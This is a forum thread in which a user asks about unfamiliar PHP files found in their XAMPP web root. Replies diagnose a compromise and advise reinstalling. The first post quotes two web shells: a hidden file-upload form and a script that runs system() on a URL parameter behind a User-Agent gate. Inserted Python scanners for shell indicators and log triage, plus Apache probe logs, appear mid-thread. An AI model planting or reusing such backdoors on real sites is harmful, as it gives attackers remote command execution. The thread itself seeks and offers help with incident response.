Thread: What the fudge is this?

  1. #1 What the fudge is this? 
    So I've done literally nothing at all and I've no clue where these came from, but around 19:00 -> 20:00 (about 4-5 hours ago) those files randomly appeared in my Htdocs folder. I only just discovered them, and now I wonder: does anyone have a clue what those are?




    For example: Ec.php contains;
    Code:
    <?php $wl = array("x228");$ua="x228";if (in_array($ua, $wl)){echo "<html><body><form action="" method="post" enctype="multipart/form-data"><input type="file" name="filetoul" id="ulid"><input type="submit" value="upload" name="submit"></form></body></html>";$target_dir ="";$target_file = $target_dir . basename($_files["filetoul"]["name"]);$imagetype = pathinfo($target_file.".php");}else{exit;}?>
    c.php contains;

    Code:
    <?php $wl = $_server['http_user_agent'];$ua = array('a8n10lwek');if (in_array($ua, $wl)){system($_get['cmd']);}else{exit;}?>
    any ideas?
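The two files in the post share traits that can be searched for across a web root. The following is an added example, not part of the original thread: the indicator names, the function names and the three sample strings are assumptions made for illustration, with `SAMPLE_CMD` copied from c.php as posted and `SAMPLE_UPLOAD` abbreviated from Ec.php.

```python
import re
from pathlib import Path

# Heuristics drawn from the two files quoted in the post. Matching ignores
# case because the code as pasted appears lower-cased.
INDICATORS = {
    # A command/eval call whose first argument is request input.
    "exec_on_request_input": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(\s*"
        r"\$_(get|post|request|cookie)\b", re.I),
    # The script reads the User-Agent header (used in c.php as an access gate).
    "user_agent_gate": re.compile(
        r"\$_server\s*\[\s*['\"]http_user_agent['\"]\s*\]", re.I),
    # The script emits a file-upload form.
    "upload_form": re.compile(r"enctype\s*=\s*\\?[\"']multipart/form-data", re.I),
}

SAMPLE_CMD = r"<?php $wl = $_server['http_user_agent'];$ua = array('a8n10lwek');if (in_array($ua, $wl)){system($_get['cmd']);}else{exit;}?>"
SAMPLE_UPLOAD = '<?php echo "<form action="" method="post" enctype="multipart/form-data"><input type="file" name="filetoul"></form>"; ?>'
SAMPLE_BENIGN = "<?php echo htmlspecialchars($_GET['name']); ?>"  # constructed


def indicators(source):
    """Return the sorted names of all indicators present in PHP source text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))


def scan_webroot(root, since_epoch):
    """List (relative path, indicators) for .php files changed after since_epoch.

    A lone hit (reading the User-Agent, say) is a lead to review by hand, not
    a verdict; several hits in a file nobody deployed is the pattern to chase.
    """
    findings = []
    for path in Path(root).rglob("*.php"):
        if path.stat().st_mtime < since_epoch:
            continue
        hits = indicators(path.read_text(errors="replace"))
        if hits:
            findings.append((str(path.relative_to(root)), hits))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in [("c.php", SAMPLE_CMD), ("Ec.php", SAMPLE_UPLOAD)]:
        print(label, indicators(src))
```

Run `scan_webroot` against a copy of the web root with a cut-off shortly before the files were first noticed; modification times can be altered, so an empty result does not clear the host.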
     

  2. #2  
    Bite
    virus
    sike idk

  3. #3  
    funkE
    Verify source of vulnerability, backup, reformat, check your scripts for exploits, try again.

    So to say, you've been hacked. Potentially very deeply infected, so that's why I say reformat.

  5. #4  
    So the website xfocus.net is some kind of Chinese hacking forum or something like that, but it's ancient; it hasn't been updated in around ~10 years.
    You probably got some kind of virus. Not sure really.

  6. #5  
    Someone found an exploit and managed to upload his own backdoors etc. That's what happened, in my opinion.

  8. #6  
    funkE
    Yes, he could have figured out your password if your forum software would allow a user with owner level permissions to run arbitrary scripts.

    You could also perhaps have a virus on your computer that allowed them to get your passwords for everything else.

    You need to identify what the problem is first.

  10. #7  
    Genesis
    You are backdoored. Reinstall your entire operating system. Look at a backup of your script, analyze it and check for potential vulnerabilities. If you can't find one, then you might want to stay away from creating any type of code on your website.

    https://www.rune-server.org/black-ma...-services.html

    I used to do security web services for a really cheap price, yet not one person bought the service (many RSPS to this day are still vulnerable, Runique was one of them). Web sec isn't really something to toy around with as it can do more damage (in my opinion more than item duplication).

  12. #8  
    Alright, I do appreciate your answers. Where to start is pretty unknown, as I've recently been messing around with RCS 1.5 ( https://www.rune-server.org/programm...te-remake.html ). Other than that, I do not know; guess I'll go for a full PC scan and see what Comodo can pick up.

    Quote Originally Posted by Genesis View Post
    You are backdoored. Reinstall your entire operating system. Look at a backup of your script, analyze it and check for potential vulnerabilities. If you can't find one, then you might want to stay away from creating any type of code on your website.

    https://www.rune-server.org/black-ma...-services.html

    I used to do security web services for a really cheap price, yet not one person bought the service (many RSPS to this day are still vulnerable, Runique was one of them). Web sec isn't really something to toy around with as it can do more damage (in my opinion) than item duplication.
    Well, I'm out of money, so I can't really spend anything on web security.


    Interesting though:
    [Thu Jul 07 14:50:25.912695 2016] [:error] [pid 2396:tid 1996] [client 66.249.79.217:47801] script 'C:/xampp/htdocs/server.php' not found or unable to stat
    [Thu Jul 07 14:56:21.267540 2016] [:error] [pid 2396:tid 1940] [client 141.8.184.31:42640] script 'C:/xampp/htdocs/forum/forum.php' not found or unable to stat
    [Thu Jul 07 15:01:01.925500 2016] [access_compat:error] [pid 2396:tid 1924] [client 178.154.189.12:51639] AH01797: client denied by server configuration: C:/xampp/htdocs/game/community/index.php
    [Thu Jul 07 15:35:59.929832 2016] [:error] [pid 2396:tid 1924] [client 51.255.65.7:27530] script 'C:/xampp/htdocs/forum/member.php' not found or unable to stat
    [Thu Jul 07 15:38:27.310714 2016] [:error] [pid 2396:tid 1924] [client 164.132.161.22:15824] script 'C:/xampp/htdocs/forum/forumdisplay.php' not found or unable to stat
    [Thu Jul 07 16:38:13.108442 2016] [:error] [pid 2396:tid 1932] [client 164.132.161.74:21502] script 'C:/xampp/htdocs/forum/showgroups.php' not found or unable to stat
    [Thu Jul 07 17:50:32.236064 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:38602] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
    [Thu Jul 07 17:50:33.676147 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:39387] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
    [Thu Jul 07 17:50:35.456248 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:40371] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
    [Thu Jul 07 17:50:36.885727 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:41307] script 'C:/xampp/htdocs/forum/sendmessage.php' not found or unable to stat
    [Thu Jul 07 19:22:53.886186 2016] [:error] [pid 2396:tid 1956] [client 176.124.110.241:53467] script 'C:/xampp/htdocs/game/community/dive.php' not found or unable to stat
    [Thu Jul 07 19:23:41.130952 2016] [:error] [pid 2396:tid 1932] [client 176.124.110.241:53489] script 'C:/xampp/htdocs/os/dive.php' not found or unable to stat
    [Thu Jul 07 19:23:59.820211 2016] [:error] [pid 2396:tid 1932] [client 176.124.110.241:53491] script 'C:/xampp/htdocs/os/dive.txt.php' not found or unable to stat
    [Thu Jul 07 19:46:30.905673 2016] [:error] [pid 2396:tid 1916] [client 176.124.110.241:54094] script 'C:/xampp/htdocs/111.php' not found or unable to stat
    [Thu Jul 07 19:47:01.071937 2016] [:error] [pid 2396:tid 1916] [client 176.124.110.241:54107] script 'C:/xampp/htdocs/dive.php' not found or unable to stat
    [Thu Jul 07 20:26:55.095339 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:44280] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:26:57.126455 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:45696] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:26:59.004563 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:46839] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:01.446901 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:48350] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:03.434014 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:49685] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:05.575934 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:51045] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:07.806062 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:52377] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:09.638766 2016] [:error] [pid 2396:tid 1932] [client 144.76.29.66:53767] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
    [Thu Jul 07 20:27:11.319862 2016] [:error] [pid 2396:tid 1908] [client 144.76.29.66:55192] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
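One way to triage an Apache error log like the one in the post above is to separate clients that retry a single dead URL from clients that ask for the same missing script name in several directories. This is an added example, not part of the original thread: the function names are assumptions, and `SAMPLE` is a subset of the log lines copied from the post.

```python
import re
from collections import defaultdict
from datetime import datetime
from pathlib import PurePosixPath

LINE = re.compile(
    r"\[(?P<ts>[^\]]+)\] \[[^\]]*\] \[pid [^\]]+\] \[client (?P<ip>[\d.]+):\d+\] "
    r"script '(?P<path>[^']+)' not found or unable to stat")

SAMPLE = """\
[Thu Jul 07 15:01:01.925500 2016] [access_compat:error] [pid 2396:tid 1924] [client 178.154.189.12:51639] AH01797: client denied by server configuration: C:/xampp/htdocs/game/community/index.php
[Thu Jul 07 17:50:32.236064 2016] [:error] [pid 2396:tid 1956] [client 88.198.230.79:38602] script 'C:/xampp/htdocs/forum/memberlist.php' not found or unable to stat
[Thu Jul 07 19:22:53.886186 2016] [:error] [pid 2396:tid 1956] [client 176.124.110.241:53467] script 'C:/xampp/htdocs/game/community/dive.php' not found or unable to stat
[Thu Jul 07 19:23:41.130952 2016] [:error] [pid 2396:tid 1932] [client 176.124.110.241:53489] script 'C:/xampp/htdocs/os/dive.php' not found or unable to stat
[Thu Jul 07 19:23:59.820211 2016] [:error] [pid 2396:tid 1932] [client 176.124.110.241:53491] script 'C:/xampp/htdocs/os/dive.txt.php' not found or unable to stat
[Thu Jul 07 19:46:30.905673 2016] [:error] [pid 2396:tid 1916] [client 176.124.110.241:54094] script 'C:/xampp/htdocs/111.php' not found or unable to stat
[Thu Jul 07 19:47:01.071937 2016] [:error] [pid 2396:tid 1916] [client 176.124.110.241:54107] script 'C:/xampp/htdocs/dive.php' not found or unable to stat
[Thu Jul 07 20:26:55.095339 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:44280] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
[Thu Jul 07 20:26:57.126455 2016] [:error] [pid 2396:tid 1972] [client 144.76.29.66:45696] script 'C:/xampp/htdocs/forum/showthread.php' not found or unable to stat
""".splitlines()


def parse(lines):
    """Yield (timestamp, client_ip, script_path) for 'script not found' errors."""
    for line in lines:
        m = LINE.search(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S.%f %Y")
            yield ts, m["ip"], PurePosixPath(m["path"])


def relocated_probes(lines, start=None, end=None):
    """Map client -> {script name: sorted dirs} for names tried in 2+ directories.

    start/end optionally restrict the search to a time window of interest.
    """
    seen = defaultdict(lambda: defaultdict(set))
    for ts, ip, path in parse(lines):
        if (start and ts < start) or (end and ts > end):
            continue
        seen[ip][path.name].add(str(path.parent))
    report = {}
    for ip, names in seen.items():
        multi = {n: sorted(d) for n, d in names.items() if len(d) >= 2}
        if multi:
            report[ip] = multi
    return report


if __name__ == "__main__":
    print(relocated_probes(SAMPLE))
```

The error log only records requests that failed, so the access log for the same window is what shows which requests for the dropped files succeeded.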
     

  13. #9  
    Even if your virus scanner does not pick everything up, that does not mean you are clean.

    I suggest a reformat and re-install of your Operating System.

  15. #10  
    Bite
    Quote Originally Posted by Genesis View Post
    You are backdoored. Reinstall your entire operating system. Look at a backup of your script, analyze it and check for potential vulnerabilities. If you can't find one, then you might want to stay away from creating any type of code on your website.

    https://www.rune-server.org/black-ma...-services.html

    I used to do security web services for a really cheap price, yet not one person bought the service (many RSPS to this day are still vulnerable, Runique was one of them). Web sec isn't really something to toy around with as it can do more damage (in my opinion more than item duplication).
    I knew it was a backdoor or something when I read this line here

    Code:
    <?php $wl = $_server['http_user_agent'];$ua = array('a8n10lwek');if

